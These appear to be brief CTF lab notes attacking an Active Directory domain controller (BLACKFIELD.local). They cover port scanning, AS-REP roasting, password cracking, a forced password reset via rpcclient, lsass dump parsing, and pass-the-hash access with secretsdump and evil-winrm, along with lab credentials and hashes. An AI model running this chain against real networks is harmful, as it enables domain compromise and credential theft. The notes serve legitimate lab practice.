Machine IP: 10.10.10.192▶ nmap -Pn -sS -O -p- 10.10.10.192 -T4 --min-rate 1000 -oN ports.nmap
Nmap scan report for 10.10.10.192
Host is up (0.18s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.41 seconds▶ nmap -Pn -sC -sV -p 53,88,135,389,445,593,3268,5985 10.10.10.192 -oN services.nmap
Nmap scan report for 10.10.10.192
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-20 13:56:42Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m34s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-05-20T13:57:07
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.98 seconds- Anonymous and Guest Enumeration
▶ smbmap -H 10.10.10.192 -u guest
SMB shares reveal two non-default shares named forensic and profiles$. The share forensic is not accessible however read-only access is allowed on the profiles$ share.
- Kerberos Pre-Authentication Attack (ASREPRoast)
- Craft a list of users to spray the users
▶ smbclient -N \\\\10.10.10.192\\profiles$ -c ls | awk '{ print $1 }' | tee users.txt▶ impacket-GetNPUsers blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
▶ john krb.hash --format=krb5asrep
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)▶ bloodhound-python --username support --password '#00^BlackKnight' --domain blackfield.local --nameserver 10.10.10.192 --collectionmethod all▶ neo4j console▶ bloodhound --no-sandboxUpload files generated by bloodhound.py to BloodHound console.
▶ rpcclient 10.10.10.192 -U 'support'
Password for [WORKGROUP\support]:
rpcclient $> setuserinfo2 audit2020 23 Password123
rpcclient $> exit
▶ crackmapexec smb 10.10.10.192 -u audit2020 -p Password123
▶ smbclient \\\\10.10.10.192\\forensic -U "audit2020"
▶ pypykatz lsa minidump lsass.DMP
▶ impacket-secretsdump blackfield.local/administrator@10.10.10.192 -hashes :7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -dc-ip 10.10.10.192▶ impacket-secretsdump blackfield.local/'dc01$'@10.10.10.192 -hashes :b624dc83a27cc29da11d9bf25efea796 -dc-ip 10.10.10.192
▶ crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
▶ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
▶